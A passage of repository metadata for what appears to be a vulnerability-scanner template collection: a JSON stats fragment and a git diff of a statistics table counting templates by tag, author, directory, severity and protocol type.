default-login","count":1},{"name":"ulterius","count":1},{"name":"csrfguard","count":1},{"name":"umbraco","count":1},{"name":"mobileiron","count":1},{"name":"sentry","count":1},{"name":"jquery","count":1},{"name":"kubeflow","count":1},{"name":"htmli","count":1},{"name":"kyan","count":1},{"name":"thedogapi","count":1},{"name":"moin","count":1},{"name":"fontawesome","count":1},{"name":"ecom","count":1},{"name":"leanix","count":1},{"name":"cloudron","count":1},{"name":"kindeditor","count":1},{"name":"feifeicms","count":1},{"name":"jumpcloud","count":1},{"name":"iconfinder","count":1},{"name":"shopware","count":1},{"name":"postmark","count":1},{"name":"visualstudio","count":1},{"name":"remkon","count":1},{"name":"selea","count":1},{"name":"pagerduty","count":1},{"name":"xdcms","count":1},{"name":"cves2001","count":1},{"name":"blind","count":1},{"name":"lg-nas","count":1},{"name":"qvisdvr","count":1},{"name":"sast","count":1},{"name":"dbeaver","count":1},{"name":"oscommerce","count":1},{"name":"smartblog","count":1},{"name":"fortigate","count":1},{"name":"iucn","count":1},{"name":"bazarr","count":1},{"name":"biometrics","count":1},{"name":"rubedo","count":1},{"name":"camunda","count":1},{"name":"timesheet","count":1},{"name":"graph","count":1},{"name":"eyou","count":1},{"name":"rabbitmq","count":1},{"name":"opentsdb","count":1},{"name":"sterling","count":1},{"name":"phalcon","count":1},{"name":"auth","count":1},{"name":"nimble","count":1},{"name":"urlscan","count":1},{"name":"ognl","count":1},{"name":"jenkin","count":1},{"name":"vscode","count":1},{"name":"empirecms","count":1},{"name":"wazuh","count":1},{"name":"nc2","count":1},{"name":"traefik","count":1},{"name":"esmtp","count":1},{"name":"xml","count":1},{"name":"fcm","count":1},{"name":"expose","count":1},{"name":"mediumish","count":1},{"name":"mod-proxy","count":1},{"name":"finereport","count":1},{"name":"dom","count":1},{"name":"setup","count":1},{"name":"cgi","count":1},{"name":"csrf","count":1},{"name":"webadmin","count":1},{"name":"rijksmuseum","count":1},{"name":"nexusdb","count":1},{"name":"interlib","count":1},{"name":"cobub","count":1},{"name":"find","count":1},{"name":"speed","count":1},{"name":"glances","count":1},{"name":"facebook","count":1},{"name":"landrayoa","count":1},{"name":"elevation","count":1},{"name":"gurock","count":1},{"name":"acme","count":1},{"name":"gsoap","count":1},{"name":"majordomo2","count":1},{"name":"discord","count":1},{"name":"wifisky","count":1},{"name":"beanstalk","count":1},{"name":"mongo","count":1},{"name":"linksys","count":1},{"name":"tileserver","count":1},{"name":"aniapi","count":1},{"name":"etherscan","count":1},{"name":"messaging","count":1},{"name":"fortilogger","count":1},{"name":"testrail","count":1},{"name":"bullwark","count":1},{"name":"blackboard","count":1},{"name":"wmt","count":1},{"name":"appveyor","count":1},{"name":"raspap","count":1},{"name":"opencast","count":1},{"name":"cocoon","count":1},{"name":"expressjs","count":1},{"name":"pulsesecure","count":1},{"name":"netlify","count":1},{"name":"sco","count":1},{"name":"sureline","count":1},{"name":"dreamweaver","count":1},{"name":"phpinfo","count":1},{"name":"wix","count":1},{"name":"netrc","count":1},{"name":"contentkeeper","count":1},{"name":"tink","count":1},{"name":"etherpad","count":1},{"name":"maxsite","count":1},{"name":"place","count":1},{"name":"phpwiki","count":1},{"name":"opensns","count":1},{"name":"cors","count":1},{"name":"powercreator","count":1},{"name":"omi","count":1},{"name":"email","count":1},{"name":"iterable","count":1},{"name":"directions","count":1},{"name":"package","count":1},{"name":"solarlog","count":1},{"name":"stripe","count":1},{"name":"rhymix","count":1},{"name":"shopizer","count":1},{"name":"avtech","count":1},{"name":"mailgun","count":1},{"name":"vidyo","count":1},{"name":"dotnet","count":1},{"name":"pentaho","count":1},{"name":"webex","count":1},{"name":"openweather","count":1},{"name":"listserv","count":1},{"name":"bash","count":1},{"name":"concrete","count":1},{"name":"uwsgi","count":1},{"name":"artica","count":1},{"name":"hortonworks","count":1},{"name":"limit","count":1},{"name":"grails","count":1},{"name":"cscart","count":1},{"name":"ntopng","count":1},{"name":"redcap","count":1},{"name":"securityspy","count":1},{"name":"nuxeo","count":1},{"name":"cve2006","count":1},{"name":"simplecrm","count":1},{"name":"apiman","count":1},{"name":"hadoop","count":1},{"name":"pacsone","count":1},{"name":"skywalking","count":1},{"name":"nedi","count":1},{"name":"extractor","count":1},{"name":"servicenow","count":1},{"name":"phpfusion","count":1},{"name":"buildkite","count":1},{"name":"codemeter","count":1},{"name":"secmail","count":1},{"name":"cve202","count":1},{"name":"ns","count":1},{"name":"comodo","count":1},{"name":"monitorr","count":1},{"name":"pmb","count":1},{"name":"adb","count":1},{"name":"locations","count":1},{"name":"cockpit","count":1},{"name":"wing-ftp","count":1},{"name":"pippoint","count":1},{"name":"tenda","count":1},{"name":"glowroot","count":1},{"name":"resourcespace","count":1},{"name":"sonarcloud","count":1},{"name":"keenetic","count":1},{"name":"wiki","count":1},{"name":"iptime","count":1},{"name":"accela","count":1},{"name":"netgenie","count":1},{"name":"api-manager","count":1},{"name":"beanshell","count":1},{"name":"nsasg","count":1},{"name":"asana","count":1},{"name":"eg","count":1},{"name":"labtech","count":1},{"name":"tensorboard","count":1},{"name":"smi","count":1},{"name":"gogs","count":1},{"name":"nomad","count":1},{"name":"wp","count":1},{"name":"lighttpd","count":1},{"name":"phpshowtime","count":1},{"name":"appweb","count":1},{"name":"axiom","count":1},{"name":"jitsi","count":1},{"name":"calendly","count":1},{"name":"basic-auth","count":1},{"name":"expn","count":1},{"name":"circontrol","count":1},{"name":"moinmoin","count":1},{"name":"spotify","count":1},{"name":"sar2html","count":1},{"name":"blue-ocean","count":1},{"name":"zms","count":1},{"name":"wakatime","count":1},{"name":"lancom","count":1},{"name":"alienvault","count":1},{"name":"cherokee","count":1},{"name":"seeddms","count":1},{"name":"weglot","count":1},{"name":"mdb","count":1},{"name":"chinaunicom","count":1},{"name":"vanguard","count":1},{"name":"etouch","count":1},{"name":"openstack","count":1},{"name":"catfishcms","count":1},{"name":"olivetti","count":1},{"name":"dompdf","count":1},{"name":"abuseipdb","count":1},{"name":"ghost","count":1},{"name":"mariadb","count":1},{"name":"dbt","count":1},{"name":"acontent","count":1},{"name":"thecatapi","count":1},{"name":"jsp","count":1},{"name":"lutron","count":1},{"name":"scimono","count":1},{"name":"influxdb","count":1},{"name":"bigbluebutton","count":1},{"name":"jabber","count":1},{"name":"nuuo","count":1},{"name":"clockwork","count":1},{"name":"skycaiji","count":1},{"name":"graylog","count":1},{"name":"zenario","count":1},{"name":"plugin","count":1},{"name":"starttls","count":1},{"name":"st","count":1},{"name":"hiawatha","count":1},{"name":"wooyun","count":1},{"name":"ganglia","count":1},{"name":"salesforce","count":1},{"name":"mpsec","count":1},{"name":"motorola","count":1},{"name":"azkaban","count":1},{"name":"jaspersoft","count":1},{"name":"avalanche","count":1},{"name":"myucms","count":1},{"name":"ewebs","count":1},{"name":"metabase","count":1},{"name":"plastic","count":1},{"name":"ssl","count":1},{"name":"discourse","count":1},{"name":"erp-nc","count":1},{"name":"wavlink","count":1},{"name":"diris","count":1},{"name":"iceflow","count":1},{"name":"weather","count":1},{"name":"drone","count":1},{"name":"opensmtpd","count":1},{"name":"dropbox","count":1},{"name":"panos","count":1},{"name":"hubspot","count":1},{"name":"burp","count":1},{"name":"mongoshake","count":1},{"name":"rmc","count":1},{"name":"oidc","count":1},{"name":"turbocrm","count":1},{"name":"checkpoint","count":1},{"name":"mrtg","count":1},{"name":"okiko","count":1},{"name":"taiga","count":1},{"name":"zyxel","count":1},{"name":"socomec","count":1},{"name":"dotclear","count":1},{"name":"triconsole","count":1},{"name":"travis","count":1},{"name":"buttercms","count":1},{"name":"sendgrid","count":1},{"name":"database","count":1},{"name":"apos","count":1},{"name":"spectracom","count":1},{"name":"couchbase","count":1},{"name":"gitea","count":1},{"name":"qdpm","count":1},{"name":"weiphp","count":1},{"name":"elascticsearch","count":1},{"name":"panasonic","count":1},{"name":"magicflow","count":1},{"name":"perl","count":1},{"name":"aura","count":1},{"name":"zte","count":1},{"name":"webctrl","count":1},{"name":"swagger","count":1},{"name":"trilithic","count":1},{"name":"novnc","count":1},{"name":"processmaker","count":1},{"name":"addpac","count":1},{"name":"fuelcms","count":1},{"name":"geddy","count":1},{"name":"mantisbt","count":1},{"name":"javamelody","count":1},{"name":"flexbe","count":1},{"name":"binance","count":1},{"name":"route","count":1},{"name":"k8s","count":1},{"name":"goahead","count":1},{"name":"cloudinary","count":1},{"name":"logontracer","count":1},{"name":"szhe","count":1},{"name":"monitorix","count":1},{"name":"virustotal","count":1},{"name":"piluscart","count":1},{"name":"aspnuke","count":1},{"name":"cloudflare","count":1},{"name":"domxss","count":1},{"name":"tongda","count":1},{"name":"argussurveillance","count":1},{"name":"xampp","count":1},{"name":"javafaces","count":1},{"name":"billquick","count":1},{"name":"zend","count":1},{"name":"tamronos","count":1},{"name":"gloo","count":1},{"name":"postmessage","count":1},{"name":"robomongo","count":1},{"name":"idemia","count":1},{"name":"tjws","count":1},{"name":"pyramid","count":1},{"name":"node-red-dashboard","count":1},{"name":"gateone","count":1},{"name":"soar","count":1},{"name":"74cms","count":1},{"name":"ems","count":1},{"name":"dvwa","count":1},{"name":"jenzabar","count":1},{"name":"elfinder","count":1},{"name":"autocomplete","count":1},{"name":"scs","count":1},{"name":"sqlite","count":1},{"name":"nordex","count":1},{"name":"rujjie","count":1},{"name":"viewlinc","count":1},{"name":"sangfor","count":1},{"name":"klog","count":1},{"name":"instagram","count":1},{"name":"bedita","count":1},{"name":"tensorflow","count":1},{"name":"sprintful","count":1},{"name":"zarafa","count":1},{"name":"landray","count":1},{"name":"distance","count":1},{"name":"graphite","count":1},{"name":"saltapi","count":1},{"name":"cvnd","count":1},{"name":"nearby","count":1},{"name":"myanimelist","count":1},{"name":"announcekit","count":1},{"name":"sophos","count":1},{"name":"strava","count":1},{"name":"maccmsv10","count":1},{"name":"covalent","count":1},{"name":"nerdgraph","count":1},{"name":"haproxy","count":1},{"name":"clickhouse","count":1},{"name":"pgadmin","count":1},{"name":"youtube","count":1},{"name":"tracer","count":1},{"name":"solman","count":1},{"name":"clusterengine","count":1},{"name":"matrix","count":1},{"name":"ipstack","count":1},{"name":"pagespeed","count":1},{"name":"anchorcms","count":1},{"name":"sgp","count":1},{"name":"werkzeug","count":1},{"name":"tika","count":1},{"name":"jeewms","count":1},{"name":"cliniccases","count":1},{"name":"sidekiq","count":1},{"name":"clink-office","count":1},{"name":"zmanda","count":1},{"name":"cyberoam","count":1},{"name":"gilacms","count":1},{"name":"websphere","count":1},{"name":"gespage","count":1},{"name":"zm","count":1},{"name":"flink","count":1},{"name":"fastapi","count":1},{"name":"servicedesk","count":1},{"name":"pihole","count":1},{"name":"spf","count":1},{"name":"openx","count":1},{"name":"exacqvision","count":1},{"name":"stem","count":1},{"name":"netdata","count":1},{"name":"alertmanager","count":1},{"name":"alerta","count":1},{"name":"ueditor","count":1},{"name":"h3c-imc","count":1},{"name":"xvr","count":1},{"name":"wamp","count":1},{"name":"mysql","count":1},{"name":"rsyncd","count":1},{"name":"qsan","count":1},{"name":"mirai","count":1},{"name":"default","count":1},{"name":"woocomernce","count":1},{"name":"vnc","count":1},{"name":"geutebruck","count":1},{"name":"daybyday","count":1},{"name":"eyelock","count":1},{"name":"playable","count":1},{"name":"photo","count":1},{"name":"onelogin","count":1},{"name":"xmpp","count":1},{"name":"optimizely","count":1},{"name":"whm","count":1},{"name":"panabit","count":1},{"name":"nifi","count":1},{"name":"graphql","count":1},{"name":"rdp","count":1},{"name":"nweb2fax","count":1},{"name":"planon","count":1},{"name":"zzzcms","count":1},{"name":"wondercms","count":1},{"name":"visionhub","count":1},{"name":"dnn","count":1},{"name":"acexy","count":1},{"name":"synnefo","count":1},{"name":"gunicorn","count":1},{"name":"bookstack","count":1},{"name":"elasticsearch","count":1},{"name":"nette","count":1},{"name":"huijietong","count":1},{"name":"loqate","count":1},{"name":"loganalyzer","count":1},{"name":"thinkadmin","count":1},{"name":"vercel","count":1},{"name":"svnserve","count":1},{"name":"vsftpd","count":1},{"name":"bing","count":1},{"name":"gitlist","count":1},{"name":"subrion","count":1},{"name":"adafruit","count":1},{"name":"b2evolution","count":1},{"name":"key","count":1},{"name":"tectuus","count":1}],"authors":[{"name":"dhiyaneshdk","count":315},{"name":"daffainfo","count":308},{"name":"pikpikcu","count":281},{"name":"pdteam","count":210},{"name":"geeknik","count":172},{"name":"dwisiswant0","count":152},{"name":"gy741","count":85},{"name":"pussycat0x","count":77},{"name":"princechaddha","count":67},{"name":"madrobot","count":65},{"name":"zzeitlin","count":63},{"name":"0x_akoko","count":62},{"name":"gaurang","count":42},{"name":"philippedelteil","count":31},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"r3dg33k","count":12},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"nadino","count":10},{"name":"hackergautam","count":10},{"name":"righettod","count":10},{"name":"melbadry9","count":10},{"name":"wdahlenb","count":10},{"name":"meme-lord","count":8},{"name":"emadshanab","count":8},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"zh","count":8},{"name":"oppsec","count":7},{"name":"randomstr1ng","count":7},{"name":"dr_set","count":7},{"name":"dogasantos","count":7},{"name":"kophjager007","count":7},{"name":"0x240x23elu","count":7},{"name":"harshbothra_","count":7},{"name":"techryptic (@tech)","count":7},{"name":"johnk3r","count":6},{"name":"__fazal","count":6},{"name":"logicalhunter","count":6},{"name":"caspergn","count":6},{"name":"pentest_swissky","count":6},{"name":"puzzlepeaches","count":6},{"name":"divya_mudgal","count":6},{"name":"xelkomy","count":5},{"name":"panch0r3d","count":5},{"name":"rootxharsh","count":5},{"name":"yanyun","count":5},{"name":"lu4nx","count":5},{"name":"iamnoooob","count":5},{"name":"elsfa7110","count":5},{"name":"joanbono","count":5},{"name":"ganofins","count":5},{"name":"nodauf","count":4},{"name":"tess","count":4},{"name":"e_schultze_","count":4},{"name":"wisnupramoedya","count":4},{"name":"incogbyte","count":4},{"name":"leovalcante","count":4},{"name":"alifathi-h1","count":3},{"name":"dudez","count":3},{"name":"impramodsargar","count":3},{"name":"shine","count":3},{"name":"jarijaas","count":3},{"name":"idealphase","count":3},{"name":"skeltavik","count":3},{"name":"andydoering","count":3},{"name":"mavericknerd","count":3},{"name":"johnjhacking","count":3},{"name":"binaryfigments","count":3},{"name":"0w4ys","count":3},{"name":"shifacyclewala","count":3},{"name":"unstabl3","count":3},{"name":"forgedhallpass","count":3},{"name":"fyoorer","count":3},{"name":"z3bd","count":3},{"name":"vsh00t","count":3},{"name":"me9187","count":3},{"name":"thomas_from_offensity","count":3},{"name":"_generic_human_","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"emenalf","count":3},{"name":"f1tz","count":3},{"name":"sullo","count":3},{"name":"_0xf4n9x_","count":3},{"name":"github.com/its0x08","count":3},{"name":"sushantkamble","count":3},{"name":"w4cky_","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"alph4byt3","count":2},{"name":"moritz nentwig","count":2},{"name":"afaq","count":2},{"name":"0xcrypto","count":2},{"name":"whoever","count":2},{"name":"socketz","count":2},{"name":"r12w4n","count":2},{"name":"0xelkomy","count":2},{"name":"r3naissance","count":2},{"name":"cocxanh","count":2},{"name":"ree4pwn","count":2},{"name":"kiblyn11","count":2},{"name":"hetroublemakr","count":2},{"name":"lotusdll","count":2},{"name":"fabaff","count":2},{"name":"dahse89","count":2},{"name":"manas_harsh","count":2},{"name":"foulenzer","count":2},{"name":"convisoappsec","count":2},{"name":"hahwul","count":2},{"name":"dheerajmadhukar","count":2},{"name":"davidmckennirey","count":2},{"name":"bernardofsr","count":2},{"name":"zomsop82","count":2},{"name":"0xsapra","count":2},{"name":"bing0o","count":2},{"name":"bp0lr","count":2},{"name":"0xsmiley","count":2},{"name":"0xprial","count":2},{"name":"mohammedsaneem","count":2},{"name":"sy3omda","count":2},{"name":"its0x08","count":2},{"name":"x1m_martijn","count":2},{"name":"gevakun","count":2},{"name":"0xrudra","count":2},{"name":"random-robbie","count":2},{"name":"vavkamil","count":2},{"name":"randomrobbie","count":2},{"name":"pxmme1337","count":2},{"name":"lark-lab","count":2},{"name":"g4l1t0","count":2},{"name":"martincodes-de","count":2},{"name":"arcc","count":2},{"name":"amsda","count":2},{"name":"joeldeleep","count":2},{"name":"gal nagli","count":2},{"name":"koti2","count":2},{"name":"huowuzhao","count":2},{"name":"swissky","count":2},{"name":"nkxxkn","count":2},{"name":"bsysop","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"parth","count":2},{"name":"udit_thakkur","count":2},{"name":"ehsahil","count":2},{"name":"alperenkesk","count":1},{"name":"nvn1729","count":1},{"name":"andirrahmani1","count":1},{"name":"bjhulst","count":1},{"name":"vzamanillo","count":1},{"name":"willd96","count":1},{"name":"ilovebinbash","count":1},{"name":"regala_","count":1},{"name":"elmahdi","count":1},{"name":"jteles","count":1},{"name":"knassar702","count":1},{"name":"mhdsamx","count":1},{"name":"akash.c","count":1},{"name":"sec_hawk","count":1},{"name":"smaranchand","count":1},{"name":"shelld3v","count":1},{"name":"oscarintherocks","count":1},{"name":"@dwisiswant0","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"husain","count":1},{"name":"retr02332","count":1},{"name":"yashanand155","count":1},{"name":"flag007","count":1},{"name":"majidmc2","count":1},{"name":"raesene","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"luskabol","count":1},{"name":"imnightmaree","count":1},{"name":"yashgoti","count":1},{"name":"aresx","count":1},{"name":"geraldino2","count":1},{"name":"evolutionsec","count":1},{"name":"rodnt","count":1},{"name":"tirtha_mandal","count":1},{"name":"pdp","count":1},{"name":"rotemreiss","count":1},{"name":"clarkvoss","count":1},{"name":"luci","count":1},{"name":"deena","count":1},{"name":"izn0u","count":1},{"name":"undefl0w","count":1},{"name":"pudsec","count":1},{"name":"0xh7ml","count":1},{"name":"thebinitghimire","count":1},{"name":"kareemse1im","count":1},{"name":"52971","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"zhenwarx","count":1},{"name":"shifacyclewla","count":1},{"name":"b0rn2r00t","count":1},{"name":"florianmaak","count":1},{"name":"gboddin","count":1},{"name":"igibanez","count":1},{"name":"mah3sec_","count":1},{"name":"d0rkerdevil","count":1},{"name":"daviey","count":1},{"name":"dawid-czarnecki","count":1},{"name":"revblock","count":1},{"name":"nytr0gen","count":1},{"name":"jrolf","count":1},{"name":"pratik khalane","count":1},{"name":"omarkurt","count":1},{"name":"toufik airane","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"bolli95","count":1},{"name":"kre80r","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"hanlaomo","count":1},{"name":"defr0ggy","count":1},{"name":"ahmetpergamum","count":1},{"name":"ringo","count":1},{"name":"udyz","count":1},{"name":"j33n1k4","count":1},{"name":"_darrenmartyn","count":1},{"name":"elouhi","count":1},{"name":"fq_hsu","count":1},{"name":"push4d","count":1},{"name":"whynotke","count":1},{"name":"b4uh0lz","count":1},{"name":"xstp","count":1},{"name":"ldionmarcil","count":1},{"name":"thevillagehacker","count":1},{"name":"droberson","count":1},{"name":"thezakman","count":1},{"name":"th3.d1p4k","count":1},{"name":"brabbit10","count":1},{"name":"rojanrijal","count":1},{"name":"mesaglio","count":1},{"name":"naglinagli","count":1},{"name":"micha3lb3n","count":1},{"name":"absshax","count":1},{"name":"petruknisme","count":1},{"name":"@ofjaaah","count":1},{"name":"alex","count":1},{"name":"tim_koopmans","count":1},{"name":"0xd0ff9","count":1},{"name":"0xteles","count":1},{"name":"fmunozs","count":1},{"name":"berkdusunur","count":1},{"name":"streetofhackerr007","count":1},{"name":"jeya seelan","count":1},{"name":"qlkwej","count":1},{"name":"kabirsuda","count":1},{"name":"sbani","count":1},{"name":"yavolo","count":1},{"name":"co0nan","count":1},{"name":"shreyapohekar","count":1},{"name":"b0yd","count":1},{"name":"furkansenan","count":1},{"name":"sickwell","count":1},{"name":"philippdelteil","count":1},{"name":"orpheus","count":1},{"name":"ipanda","count":1},{"name":"0h1in9e","count":1},{"name":"borna nematzadeh","count":1},{"name":"sicksec","count":1},{"name":"fopina","count":1},{"name":"notsoevilweasel","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"sshell","count":1},{"name":"harshinsecurity","count":1},{"name":"_c0wb0y_","count":1},{"name":"nerrorsec","count":1},{"name":"retr0","count":1},{"name":"apt-mirror","count":1},{"name":"intx0x80","count":1},{"name":"lethargynavigator","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"schniggie","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"noamrathaus","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"andysvints","count":1},{"name":"chron0x","count":1},{"name":"charanrayudu","count":1},{"name":"infosecsanyam","count":1},{"name":"s1r1u5_","count":1},{"name":"ahmed sherif","count":1},{"name":"0xrod","count":1},{"name":"akshansh","count":1},{"name":"hakluke","count":1},{"name":"elder tao","count":1},{"name":"exploitation","count":1},{"name":"wabafet","count":1},{"name":"jiheon-dev","count":1},{"name":"remonsec","count":1},{"name":"becivells","count":1},{"name":"affix","count":1},{"name":"0ut0fb4nd","count":1},{"name":"yuansec","count":1},{"name":"0xtavian","count":1},{"name":"soyelmago","count":1},{"name":"kurohost","count":1},{"name":"bad5ect0r","count":1},{"name":"zandros0","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"patralos","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"ooooooo_q","count":1},{"name":"blckraven","count":1},{"name":"makyotox","count":1},{"name":"ohlinge","count":1},{"name":"c3l3si4n","count":1},{"name":"un-fmunozs","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"juicypotato1","count":1},{"name":"cookiehanhoan","count":1},{"name":"manuelbua","count":1},{"name":"taielab","count":1},{"name":"lark lab","count":1},{"name":"x6263","count":1},{"name":"_harleo","count":1},{"name":"adrianmf","count":1},{"name":"mubassirpatel","count":1},{"name":"ajaysenr","count":1},{"name":"mass0ma","count":1},{"name":"iampritam","count":1},{"name":"kaizensecurity","count":1}],"directory":[{"name":"cves","count":867},{"name":"vulnerabilities","count":334},{"name":"exposed-panels","count":291},{"name":"technologies","count":211},{"name":"exposures","count":199},{"name":"misconfiguration","count":150},{"name":"token-spray","count":102},{"name":"takeovers","count":66},{"name":"default-logins","count":61},{"name":"file","count":57},{"name":"workflows","count":43},{"name":"iot","count":36},{"name":"network","count":33},{"name":"miscellaneous","count":23},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":10},{"name":"headless","count":5}],"severity":[{"name":"info","count":840},{"name":"high","count":663},{"name":"medium","count":500},{"name":"critical","count":306},{"name":"low","count":158}],"types":[{"name":"http","count":2347},{"name":"file","count":57},{"name":"network","count":46},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 6746d916ea..efd99c5c08 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,999 +1,999 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 859 | dhiyaneshdk | 315 | cves | 864 | info | 841 | http | 2345 | +| cve | 862 | dhiyaneshdk | 315 | cves | 867 | info | 840 | http | 2347 | | lfi | 353 | daffainfo | 308 | vulnerabilities | 334 | high | 663 | file | 57 | -| panel | 297 | pikpikcu | 281 | exposed-panels | 291 | medium | 498 | network | 46 | -| xss | 268 | pdteam | 209 | technologies | 211 | critical | 305 | dns | 12 | +| panel | 297 | pikpikcu | 281 | exposed-panels | 291 | medium | 500 | network | 46 | +| xss | 269 | pdteam | 210 | technologies | 211 | critical | 306 | dns | 12 | | wordpress | 263 | geeknik | 172 | exposures | 199 | low | 158 | | | -| exposure | 252 | dwisiswant0 | 152 | misconfiguration | 151 | | | | | +| exposure | 253 | dwisiswant0 | 152 | misconfiguration | 150 | | | | | | rce | 222 | gy741 | 85 | token-spray | 102 | | | | | | tech | 205 | pussycat0x | 77 | takeovers | 66 | | | | | | wp-plugin | 181 | princechaddha | 67 | default-logins | 61 | | | | | -| cve2021 | 168 | madrobot | 65 | file | 57 | | | | | -| cve2020 | 166 | zzeitlin | 63 | workflows | 43 | | | | | +| cve2021 | 169 | madrobot | 65 | file | 57 | | | | | +| cve2020 | 167 | zzeitlin | 63 | workflows | 43 | | | | | | joomla | 128 | 0x_akoko | 62 | iot | 36 | | | | | | cve2010 | 109 | gaurang | 42 | network | 33 | | | | | -| token-spray | 102 | philippedelteil | 31 | miscellaneous | 23 | | | | | -| cve2019 | 102 | ice3man | 26 | dns | 12 | | | | | +| cve2019 | 102 | philippedelteil | 31 | miscellaneous | 23 | | | | | +| token-spray | 102 | ice3man | 26 | dns | 12 | | | | | | config | 100 | organiccrap | 24 | cnvd | 10 | | | | | -| cve2018 | 94 | pr3r00t | 15 | fuzzing | 10 | | | | | -| iot | 81 | sheikhrishad | 15 | headless | 5 | | | | | -| oast | 75 | milo2012 | 14 | | | | | | | -| apache | 75 | techbrunchfr | 13 | | | | | | | +| cve2018 | 94 | sheikhrishad | 15 | fuzzing | 10 | | | | | +| iot | 81 | pr3r00t | 15 | headless | 5 | | | | | +| apache | 76 | milo2012 | 14 | | | | | | | +| oast | 75 | techbrunchfr | 13 | | | | | | | | takeover | 70 | suman_kar | 12 | | | | | | | | default-login | 69 | r3dg33k | 12 | | | | | | | | token | 68 | cyllective | 11 | | | | | | | -| file | 57 | wdahlenb | 10 | | | | | | | -| cve2017 | 53 | righettod | 10 | | | | | | | -| unauth | 51 | hackergautam | 10 | | | | | | | -| ssrf | 44 | random_robbie | 10 | | | | | | | -| network | 44 | melbadry9 | 10 | | | | | | | -| | 43 | nadino | 10 | | | | | | | -| sqli | 42 | zh | 8 | | | | | | | -| oracle | 40 | meme-lord | 8 | | | | | | | -| cve2016 | 39 | aashiq | 8 | | | | | | | -| redirect | 38 | emadshanab | 8 | | | | | | | -| logs | 35 | that_juan_ | 8 | | | | | | | -| misconfig | 33 | iamthefrogy | 8 | | | | | | | +| file | 57 | righettod | 10 | | | | | | | +| cve2017 | 53 | random_robbie | 10 | | | | | | | +| unauth | 51 | melbadry9 | 10 | | | | | | | +| network | 44 | hackergautam | 10 | | | | | | | +| ssrf | 44 | nadino | 10 | | | | | | | +| | 43 | wdahlenb | 10 | | | | | | | +| sqli | 42 | aashiq | 8 | | | | | | | +| oracle | 40 | zh | 8 | | | | | | | +| cve2016 | 40 | that_juan_ | 8 | | | | | | | +| redirect | 38 | meme-lord | 8 | | | | | | | +| logs | 35 | iamthefrogy | 8 | | | | | | | +| misconfig | 32 | emadshanab | 8 | | | | | | | +| cve2015 | 30 | randomstr1ng | 7 | | | | | | | | google | 30 | 0x240x23elu | 7 | | | | | | | -| cve2015 | 30 | harshbothra_ | 7 | | | | | | | -| atlassian | 29 | randomstr1ng | 7 | | | | | | | | jira | 29 | dogasantos | 7 | | | | | | | -| cisco | 28 | dr_set | 7 | | | | | | | -| listing | 27 | oppsec | 7 | | | | | | | -| auth-bypass | 27 | techryptic (@tech) | 7 | | | | | | | -| cve2014 | 27 | kophjager007 | 7 | | | | | | | -| generic | 24 | puzzlepeaches | 6 | | | | | | | -| disclosure | 22 | __fazal | 6 | | | | | | | -| router | 22 | johnk3r | 6 | | | | | | | +| atlassian | 29 | oppsec | 7 | | | | | | | +| cisco | 28 | techryptic (@tech) | 7 | | | | | | | +| cve2014 | 27 | harshbothra_ | 7 | | | | | | | +| listing | 27 | kophjager007 | 7 | | | | | | | +| auth-bypass | 27 | dr_set | 7 | | | | | | | +| generic | 24 | __fazal | 6 | | | | | | | +| disclosure | 22 | caspergn | 6 | | | | | | | | misc | 22 | pentest_swissky | 6 | | | | | | | -| aem | 19 | caspergn | 6 | | | | | | | -| cve2012 | 18 | logicalhunter | 6 | | | | | | | -| springboot | 18 | divya_mudgal | 6 | | | | | | | -| debug | 18 | elsfa7110 | 5 | | | | | | | -| sap | 18 | yanyun | 5 | | | | | | | -| weblogic | 16 | xelkomy | 5 | | | | | | | -| cve2011 | 15 | ganofins | 5 | | | | | | | -| devops | 15 | panch0r3d | 5 | | | | | | | -| aws | 15 | joanbono | 5 | | | | | | | +| router | 22 | johnk3r | 6 | | | | | | | +| aem | 19 | puzzlepeaches | 6 | | | | | | | +| springboot | 18 | logicalhunter | 6 | | | | | | | +| cve2012 | 18 | divya_mudgal | 6 | | | | | | | +| sap | 18 | ganofins | 5 | | | | | | | +| debug | 18 | lu4nx | 5 | | | | | | | +| weblogic | 16 | joanbono | 5 | | | | | | | +| aws | 15 | panch0r3d | 5 | | | | | | | +| cve2011 | 15 | iamnoooob | 5 | | | | | | | +| wp-theme | 15 | xelkomy | 5 | | | | | | | | fuzz | 15 | rootxharsh | 5 | | | | | | | -| wp-theme | 15 | iamnoooob | 5 | | | | | | | -| php | 15 | lu4nx | 5 | | | | | | | +| devops | 15 | elsfa7110 | 5 | | | | | | | +| php | 15 | yanyun | 5 | | | | | | | | login | 14 | incogbyte | 4 | | | | | | | -| struts | 14 | tess | 4 | | | | | | | +| cve2009 | 14 | e_schultze_ | 4 | | | | | | | +| struts | 14 | leovalcante | 4 | | | | | | | | deserialization | 14 | wisnupramoedya | 4 | | | | | | | -| cve2009 | 14 | nodauf | 4 | | | | | | | -| adobe | 13 | leovalcante | 4 | | | | | | | -| dns | 13 | 